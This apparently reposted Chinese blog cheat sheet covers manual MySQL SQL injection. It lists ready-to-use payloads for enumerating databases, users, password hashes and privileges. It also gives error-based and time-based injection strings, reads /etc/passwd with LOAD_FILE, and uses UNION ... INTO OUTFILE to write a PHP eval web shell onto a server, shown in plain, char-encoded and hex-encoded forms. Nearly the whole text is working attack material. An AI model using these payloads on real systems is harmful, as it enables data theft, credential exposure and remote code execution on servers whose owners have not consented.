SQL手工注入辅助工具

mac2022-06-30 17

mysql > 基本环境信息语句及说明 #获取版本号 SELECT @@version SELECT version() #主机名，IP地址 SELECT @@hostname; #数据目录 SELECT @@datadir; #用户名及密码 SELECT host, user, password FROM mysql.user; #用户名 SELECT user(); SELECT system_user(); SELECT user FROM mysql.user; mysql > 列举数据库语句及说明 #当前库 SELECT database(); #所有库 (Mysql>5.0) SELECT schema_name FROM information_schema.schemata; mysql > 列举表名语句及说明 #常规 SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' #根据列名找表名 SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; mysql > 列举字段名语句及说明 SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' mysql > 单条数据获取语句及说明 SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; SELECT host,user FROM user ORDER BY host LIMIT 0,1; 注射类型: 普通适用环境: 常规备注说明: LIMIT 偏移,行数 LIMIT 行数 OFFSET 偏移 mysql > 用户权限相关语句及说明 #列举用户权限 SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; #列举用户权限 SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; #列举数据库权限 SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; #列举 columns_priv SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; 注射类型: 普通适用环境: 常规备注说明: #备注-mysql权限检查方式 1)先从user表中的host、 user、 password这3个字段中判断连接的IP、用户名、密码是否存在表中，存在则通过身份验证； 2)通过权限验证，进行权限分配时，按照user>db>tables_priv>columns_priv的顺序进行分配。即先检查全局权限表 user，如果user中对应的权限为Y，则此用户对所有数据库的权限都为Y，将不再检查db, tables_priv,columns_priv；如果为N，则到db表中检查此用户对应的具体数据库，并得到db中为Y的权限；如果db中为N，则检查tables_priv中此数据库对应的具体表，取得表中的权限Y，以此类推。 mysql > 显错注入语句及说明 #方式1 and (select 1 from (select count(*),concat(SQL语句,floor(rand(0)*2))x from information_schema.tables group by x)a); #方式2 and (select count(*) from (select 1 union select null union select !1)x group by concat(sql语句,floor(rand(0)*2))); #方式3 and extractvalue(1, concat(0x5c, (SQL语句))); #方式4 and 1=(updatexml(1,concat(0x5e24,(SQL语句),0x5e24),1)); 注射类型: 普通适用环境: 常规备注说明: 对于1, 原始的报错语句如下： select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x; count(*) x 1 5.1.28-rc-community1 1 5.1.28-rc-community0 1 5.1.28-rc-community1 <-- 出现重复的x值。报错。 mysql > 延时注入语句及说明 SELECT BENCHMARK(1000000,MD5('A')); SELECT SLEEP(5); # >= 5.0.12 mysql > 文件读写语句及说明 #读取文件，需要相关权限 UNION SELECT LOAD_FILE('/etc/passwd') #写入文件，需要相关权限 SELECT * FROM mytable INTO dumpfile '/tmp/somefile' #写入文件，需要相关权限 SELECT * FROM mytable INTO outfile '/tmp/somefile' 注射类型: 常规（前提：权限，网站路径）适用环境: 常规备注说明: #小马形式1 ?id=1 and 1=2 union select 1,'<?php eval(_POST[cmd])?>',3,4,5,6 into outfile '/xx/x.php'/* #小马形式2 ?id=1 and 1=2 union select 1,char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62),3,4,5,6 into outfile '/xx/x.php'/* #小马形式3 ?id=1 and 1=2 union select 1,0x3C3F706870206576616C28245F504F53545B636D645D293F3E,3,4,5,6 into outfile '/www/home/html/coder.php'/* mysql > 判断及字符串相关语句及说明 #if判断 SELECT if(1=1,'foo','bar'); #返回foo #case when 判断 SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # 返回A #char函数，将数字转变为字符 SELECT char(65); #返回A #ascii函数，将字符转变为数字 SELECT ascii('A'); #返回65 #concat函数，将字符连接在一起 SELECT CONCAT('A','B'); #returns AB #字符串的16进制写法 SELECT 0×414243; # 返回 ABC #substring/substr函数 SELECT substr('abcd', 3, 1); #返回c #length函数 SELECT length('abcd'); #返回4 mysql写文件into outfile select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php' select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E 来自为知笔记(Wiz)

转载于:https://www.cnblogs.com/t1ny/p/10678976.html

相关资源：asp手工注入辅助工具

最新回复(0)